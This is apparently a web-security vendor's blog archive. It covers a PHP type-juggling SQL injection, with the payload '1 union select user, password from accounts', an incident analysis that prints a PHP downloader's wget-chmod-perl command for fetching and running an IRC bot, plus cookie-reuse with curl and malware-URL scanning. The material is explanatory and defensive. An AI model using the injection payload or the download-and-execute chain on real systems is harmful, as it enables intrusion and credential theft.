Monday, July 23, 2012

Food for Thought: Does a locally installed antivirus solve your website problems?

If you are a website owner who knows nothing about networks and security, this post is for you! In this post we briefly describe a classic security vulnerability and look at the difference between local and external antivirus scanning.

How does a web server work for us?

When you type the following url into your browser's address bar,
 a few things happen just before you see the text and images.
  • The browser connects to the server and “says”: “hey, can I have /articles/cooking?”
  • The server “looks” (mostly in a database) and reads all the cooking articles
  • Then the server wraps up all the information in the browser's native language (yep, that’s HTML)
  • and sends it to the browser

Let’s say a user wishes to post a comment.
  • The browser connects to the server and “says”: “hey, can you store “THE VISITOR COMMENT” under /articles/cooking?”
  • The server stores the comment in the database and tags it as belonging to the cooking articles
  • Then the server wraps the page content in HTML
  • and sends it to the browser.
So far everything looks fine and normal, so what is the problem?

What if the comment a user just posted to /articles/cooking looks like this:

 “I just found another article using a completely different approach bla bla…… Take a look at “ ← link to a malicious site

So the comment is now stored in the database, and your local antivirus should detect it, right?
Well, probably not. There are plenty of databases out there, with different storage formats that your local antivirus cannot read, and the comment might even be stored encrypted, which prevents a local antivirus from detecting it.

That’s the magic of external antivirus scanning: it sees your website exactly the way your users do (like opening the website in a browser). It no longer matters where or how the comment is stored in the database; if it is out there on your website, the external antivirus will detect it. Simple, yes, but it works like a charm :-)

Saturday, August 6, 2011

PHP Security: Automatic Integer Conversion

Hello All

This time I would like to cover a security bug that I saw today while doing some tests with our security scanner. We have added special signatures to our ZeroDayScan web security scanner to check for such bugs. In brief, PHP has another behaviour that can be used to perform SQL injection. This bug is not widely known in the PHP community.

PHP is a very popular language used in a lot of websites. PHP variables are loosely typed: the same variable can hold a string or an integer.

If you compare a PHP variable with a constant number, PHP automatically converts that variable to an integer.

So when the following code is executed:

$my_var = $_GET['my_var'];
if ($my_var == 1) {
    // nested block
}

the $my_var variable is automatically converted to an integer. This is indeed very useful. It is probably because in the background PHP uses the atoi() C library function. This atoi() function has a very interesting feature: if the number is followed by some text, like "1abc", the function returns just 1 without generating any error message.

So, in brief, if you compare "1abc" to 1 the comparison is true and execution continues into the nested block of code.

So, going back to our code:

if ("1abc" == 1) {
    // this block is executed
}

So, here comes the security issue. Inside the nested block, $my_var still has the old value "1abc". As a result it is unsafe to use it, for example when executing an SQL query, because it can contain an SQL injection.

$pageid = $_GET['pageid'];
if ($pageid == 1) {
    // vulnerable: the raw string is interpolated into the query
    $result = mysql_query("SELECT title, content from pages where page_id = $pageid");
}

Because $pageid can contain an SQL fragment that starts with the number 1, that fragment passes the comparison and is glued onto the legitimate query.

$pageid can contain the following code: "1 union select user, password from accounts".

As a result the following query is executed:

$result = mysql_query("SELECT title, content from pages where page_id = 1 union select user, password from accounts");


1. Scan your code with our security scanner to find such bugs. It is better to scan your code at every step of development. Here is a link:

2. Instead of $pageid = $_GET['pageid'] use the following code:

$pageid = intval($_GET['pageid']);

3. You can use the GreenSQL database firewall to protect your database from illegitimate queries. You can get GreenSQL Express for free. You can get it from here:
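The vulnerable check beside a hardened version, as an added example that is not from the original post. It assumes the pages table and page_id column from the snippet above, uses mysqli with a bound parameter in place of the old mysql_query() call, and the loose comparison it relies on is PHP 5/7 behaviour (PHP 8 no longer treats "1abc" == 1 as true); intval() plus a bound parameter is the right fix on every version.

```php
<?php
// Added example, not from the original post. The table and the mysqli connection
// are placeholders; nothing here is the scanner's own code.

/** Vulnerable: the loose comparison passes, yet the raw string reaches the query text. */
function pageQueryVulnerable(string $pageid): ?string {
    if ($pageid == 1) {                      // "1 union select ..." == 1 is true on PHP < 8
        return "SELECT title, content FROM pages WHERE page_id = $pageid";
    }
    return null;
}

/** Hardened: normalise to an integer first, then bind it instead of interpolating it. */
function pageQuerySafe(string $pageid, ?mysqli $db = null): ?string {
    $id = intval($pageid);                   // "1 union select ..." becomes 1
    if ($id !== 1) {
        return null;
    }
    $sql = 'SELECT title, content FROM pages WHERE page_id = ?';
    if ($db !== null) {                      // only runs when a real connection is supplied
        $stmt = $db->prepare($sql);
        $stmt->bind_param('i', $id);         // sent as an integer, never as part of the SQL text
        $stmt->execute();
    }
    return $sql;                             // the query text never contains user input
}

$input = "1 union select user, password from accounts";   // the payload from the post
var_dump(pageQueryVulnerable($input));   // full injected query on PHP < 8, NULL on PHP 8
var_dump(pageQuerySafe($input));         // "... WHERE page_id = ?" on every version
```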

Best regards,
Yuli Stremovsky

Tuesday, July 26, 2011

Casper Downloader gets shell access

One of our clients got hacked and we were asked to help him identify the security issue that the black hat hacker used to break into his website.

This specific customer had some outdated software that allowed users to upload arbitrary files. The fraudster used that script to upload a PHP script to his website and got control over the website. After that, this PHP script downloaded an IRC bot written in Perl, and from then on the server could receive commands from some IRC server.

We called this PHP script the Casper downloader because the word "Casper" appears in one of the first lines of the file.

Here is a code of this PHP downloader:

As you can see in the screenshot, the script executes a number of cryptic shell commands. After de-obfuscation, it runs the following command:

wget -O sess_sd54t4fg85gdgh58; chmod 755 sess_sd54t4fg85gdgh58; perl sess_sd54t4fg85gdgh58*

Here is how it works:
  1. Download a txt file from the attacker's server.
  2. Save the file as sess_sd54t4fg85gdgh58 (a name that looks like a PHP session file).
  3. Add executable permission to the above file.
  4. Execute the script using perl: perl sess_sd54t4fg85gdgh58

These shell commands are executed using a number of variations of the PHP exec() function (this is done in case one of the PHP functions is blocked). Besides exec(), the following functions were also used: shell_exec(), system(), passthru().

The above txt file is basically a Perl IRC bot. This bot has a number of built-in commands. For example, it can perform a port scan. It is done using the following Perl code:

In addition, this IRC bot can execute shell commands, return the results to the channel operator, and open a remote shell on the server.
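A defender-side check for this pattern, as an added example that is not part of the original analysis: it scans PHP source text for the four shell-execution functions the downloader cycles through and reports calls whose string argument chains a download with chmod and perl. The sample sources are constructed, with a placeholder URL.

```php
<?php
// Added example, not from the original post: flag exec-family calls that carry a
// download-and-run chain like the de-obfuscated command shown above.

const EXEC_FUNCS  = ['exec', 'shell_exec', 'system', 'passthru'];
const CHAIN_WORDS = ['wget', 'chmod', 'perl'];

/** Return [func, cmd] pairs for calls whose literal argument looks like a download-and-run chain. */
function findDownloaderCalls(string $source): array {
    $funcs = implode('|', EXEC_FUNCS);
    // func( 'literal' ) or func( "literal" ): group 1 = function, group 3 = the literal
    preg_match_all("/\\b($funcs)\\s*\\(\\s*(['\"])(.*?)\\2/s", $source, $m, PREG_SET_ORDER);
    $hits = [];
    foreach ($m as $call) {
        $cmd   = $call[3];
        $words = array_filter(CHAIN_WORDS, fn($w) => stripos($cmd, $w) !== false);
        if (count($words) >= 2) {            // two or more of wget/chmod/perl in one command
            $hits[] = ['func' => $call[1], 'cmd' => $cmd];
        }
    }
    return $hits;
}

// Constructed samples; the URL is a placeholder, not the real one from the incident.
$samples = [
    'clean.php'   => '<?php echo exec("uptime");',
    'dropper.php' => '<?php @system("wget -O sess_x http://PLACEHOLDER/bot.txt; chmod 755 sess_x; perl sess_x");'
                   . ' @shell_exec("wget -O sess_x http://PLACEHOLDER/bot.txt; chmod 755 sess_x; perl sess_x");',
];
foreach ($samples as $name => $src) {
    foreach (findDownloaderCalls($src) as $hit) {
        printf("%s: %s() runs: %s\n", $name, $hit['func'], $hit['cmd']);
    }
}
```

Only dropper.php is reported, once per fallback function; a file that merely calls exec("uptime") is not flagged.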

Thursday, March 31, 2011

Using curl to download password-protected pages

We are rebuilding one of our sites which was used as a blog in the past. We decided to republish one of its posts here.

Sometimes, for research, we need to download massive amounts of content from password-protected websites. It can be done manually using Internet Explorer, though it becomes a problem when downloading large numbers of pages. Done manually it is a tedious task, but it can be completely automated.

Automating the download process of massive content

For my work, I use the following tools: Firefox and curl. Both of these tools are available for Windows and Linux. Curl is a web page downloading tool, similar to the well known wget tool. I guess I do not need to say anything about Firefox; I can say that it is a much better alternative to Internet Explorer.

Basically, establish a session with the password-protected website using Firefox, then reuse the resulting cookie in a standalone curl command to fetch the website's pages.

Step 1. (optional) Clean Cookies.

Clean all cookies to reduce clutter as follows: Firefox Menu -> Tools -> Clear Private Data. The Clear Private Data window appears. Select the Cookies checkbox as follows:

Step 2. Log in to the website.

Go to the password-protected website, fill in your username and password, and log in.
For example,

Step 3. Get the cookie.

Open Firefox Preferences Window and select the Privacy tab in Firefox Menu -> Edit -> Preferences -> Privacy tab:

Next, click the Show Cookies button. Select the required website and open the Cookie window.

Pay attention to the cookie's name and content fields; we will use them in the next step.

Step 4. Create the cookie container.

The cookie container is a special text file used to store cookie values. curl can use this file to get access to your established session (you have signed in to the website, right?).

Open your favorite text editor and create the cookie.txt file with one line per cookie: FALSE / FALSE 0 cookie-name cookie-content

All fields must be separated by tabs.

For example: FALSE / FALSE 0 PHPSESSID a571d80ccf683df8da9031ada698336e

Step 5. Download the website.

We are almost done! Download the required pages by running the following command:
curl --cookie-jar cookie.txt -b cookie.txt

The cookie prompts the website to accept you as a legitimate user!

Now you can continue to download all required content by running the same shell command for each page.
For example, the commands for downloading the GreenSQL database names:

* curl --cookie-jar cookie.txt -b cookie.txt
* curl --cookie-jar cookie.txt -b cookie.txt
* curl --cookie-jar cookie.txt -b cookie.txt
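The same procedure driven from PHP's curl binding, as an added example that is not from the original post: it writes the cookie container in the Netscape format that curl reads and fetches pages with it. The host and page URLs are placeholders; the cookie name and value are the ones shown in Step 4, and the leading domain field (absent from the line above) is assumed.

```php
<?php
// Added example, not from the original post: the Step 4 cookie container written by
// code, then reused for the Step 5 downloads via PHP's curl extension.
// example.com and the page URLs are placeholders.

/** Format one cookie as a Netscape cookie-file line (seven tab-separated fields). */
function cookieJarLine(string $domain, string $name, string $value,
                       string $path = '/', bool $secure = false, int $expires = 0): string {
    // Fields: domain, include-subdomains flag, path, secure flag, expiry (0 = session), name, value
    return implode("\t", [$domain, 'FALSE', $path, $secure ? 'TRUE' : 'FALSE', (string) $expires, $name, $value]);
}

/** Write the container; the header line tells curl which format the file is in. */
function writeCookieJar(string $file, array $lines): void {
    file_put_contents($file, "# Netscape HTTP Cookie File\n" . implode("\n", $lines) . "\n");
}

/** Fetch a page with the stored session, as `curl --cookie-jar cookie.txt -b cookie.txt URL` does. */
function fetchWithSession(string $url, string $jar): string|false {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => $jar,    // read cookies from the container (-b)
        CURLOPT_COOKIEJAR      => $jar,    // write cookies the site sets back (--cookie-jar)
        CURLOPT_FOLLOWLOCATION => true,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$jar = 'cookie.txt';
writeCookieJar($jar, [cookieJarLine('example.com', 'PHPSESSID', 'a571d80ccf683df8da9031ada698336e')]);

// Placeholder page list; each page is saved under its own name.
foreach (['https://example.com/db/1', 'https://example.com/db/2'] as $url) {
    $html = fetchWithSession($url, $jar);
    file_put_contents('page_' . basename($url) . '.html', $html === false ? '' : $html);
}
```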

Friday, October 15, 2010

Website Virus Detection

Today I would like to tell you about a new and exciting feature that we have added to the scanner – Website Virus Detection. The ZeroDay web security scanner is now able to identify malware urls in the scanned websites. Some of these urls, especially the ones crafted with the iframe HTML tag, are loaded automatically: if a user visits such a page, his browser is attacked by the virus loaded from the malware url. In other cases, the site visitor needs to click on the malicious url, and as a result his browser is attacked by a computer virus.

In addition to site visitors being infected by computer viruses, the website itself can be removed from search engine results. Modern search engines are able to look for such malicious urls inside HTML pages, and if a malware url is found, the search engine can block access to the legitimate website.

If a malware url is found on your website, you should clean all the pages reported. Make sure that these malware urls do not appear in other pages as well, not only in the reported ones.

ZeroDayScan collects these malware urls from a number of resources, for example from the Zeus Tracker project.

How does a website get infected with a virus/malware url?

Fraudsters use automated tools to infect websites with malware urls. There are 3 types of tools that we are aware of. It is possible that there are some more variants.

Automatic form submitters

Fraudsters use automated tools to post links as comment spam. These are the same tools used by black hat SEO people to spam links across thousands of websites. These tools can be very smart; some of them are able to break captchas automatically. There are some ways to combat these tools: online services exist that analyze comments submitted by users and block spam submissions.

Automatic FTP Exploiter

These tools are very smart in the way they operate. They break FTP passwords or exploit bugs in FTP servers. Once access is achieved, these tools look for index pages, for example index.php, index.html, default.html, etc. They add an IFRAME link at the bottom of each infected file. All JavaScript files are changed in the same way: the tools look for files with the .js extension and add the malware url at the bottom of the file. You can take a number of steps to minimize the possibility that your website will be infected by such a tool: always update your software, use strong passwords for FTP users, do not host your website on shared hosting, and use FTP alternatives, for example FTP over SSH.

Automatic SQL Injector

These tools look for SQL injections in a website and automatically change stored data to include malicious urls. So if a website script shows data from a table where a malware url has been added to every record, these urls are displayed to the site visitor, and the visitor's computer is attacked by the computer virus loaded from the malware url. A well-known example of such activity is the Asprox virus, which exploited sites that store data in Microsoft SQL Server. To protect against such attacks it is recommended to install a database firewall like the GreenSQL database firewall.
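An "external" check of the kind this post and the Food for Thought post describe, as an added example that is not ZeroDayScan's code: it inspects a fetched page the way a visitor's browser would, so an injected iframe or a spam-comment link is found regardless of how the database stores it. The blocklist hosts and the HTML snippet are constructed sample data.

```php
<?php
// Added example, not the scanner's code: locate references to blocklisted hosts in
// rendered HTML, distinguishing auto-loaded tags (iframe, script) from click links (a).

const BLOCKLIST = ['malware.example', 'evil.example'];   // placeholder malicious hosts

/** Return each malicious reference found in $html with its tag and whether it loads automatically. */
function findMalwareUrls(string $html, array $blocklist): array {
    $dom = new DOMDocument();
    libxml_use_internal_errors(true);        // tolerate the invalid HTML real sites serve
    $dom->loadHTML($html);
    libxml_clear_errors();
    $targets = ['iframe' => 'src', 'script' => 'src', 'a' => 'href'];
    $hits = [];
    foreach ($targets as $tag => $attr) {
        foreach ($dom->getElementsByTagName($tag) as $el) {
            $url  = $el->getAttribute($attr);
            $host = strtolower((string) parse_url($url, PHP_URL_HOST));
            if ($host === '') {
                continue;                    // relative or attribute-less element: nothing to match
            }
            foreach ($blocklist as $bad) {   // exact host or any subdomain of a listed host
                if ($host === $bad || str_ends_with($host, '.' . $bad)) {
                    $hits[] = ['tag' => $tag, 'url' => $url, 'automatic' => $tag !== 'a'];
                    break;
                }
            }
        }
    }
    return $hits;
}

// Constructed page: a cooking article with a spam comment and a hidden iframe in the footer.
$page = '<html><body><h1>Cooking</h1>'
      . '<p class="comment">Take a look at <a href="http://evil.example/other">this</a></p>'
      . '<iframe src="http://cdn.malware.example/x.html" width="1" height="1"></iframe>'
      . '</body></html>';

foreach (findMalwareUrls($page, BLOCKLIST) as $hit) {
    printf("%-6s %-9s %s\n", $hit['tag'], $hit['automatic'] ? 'auto-load' : 'on-click', $hit['url']);
}
```

The iframe is reported as auto-load (the visitor is attacked on page view) and the comment link as on-click, matching the two cases the post distinguishes.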

Best regards,
ZeroDayScan team

Saturday, July 3, 2010

Number of connection errors

Hello All

We are constantly adding new features to our scanner. This time we would like to discuss a new feature that is important for all ZeroDayScan users: our new reports now show the number of connection errors in the report summary. For example, take a look at the following screenshot.

This connection error count specifies the number of cases in which our web security scanner had a problem performing a website assessment request. If this number is big, there were many connection errors and as a result not all pages were scanned. This can happen for a number of reasons. For example:

- Some websites these days are protected by web application firewalls (WAF). If the WAF detects a number of assessment attacks coming from the ZeroDayScan server, the originating IP can be blocked after a few assessment attempts.
- Some web applications have built-in flood protection; Joomla CMS, for example, has one. If the number of requests coming from the same IP is too big, that IP is blocked.
- Hosting companies run network Intrusion Prevention Systems (IPS). If an IPS detects a port scan coming from the ZeroDayScan IP address, the originating IP can be blocked.

The most important thing to note is that we are working on a mechanism that will eliminate all connection errors. Our new version will be released soon. Stay tuned...

Best regards,
ZeroDayScan team

Tuesday, June 1, 2010

Great review by

We have great news for all our users.

Our web security service was just reviewed by the leading blog covering the hottest start-ups over the internet.

Here is a direct link to the review page:

Vote for us and spread the word about our service!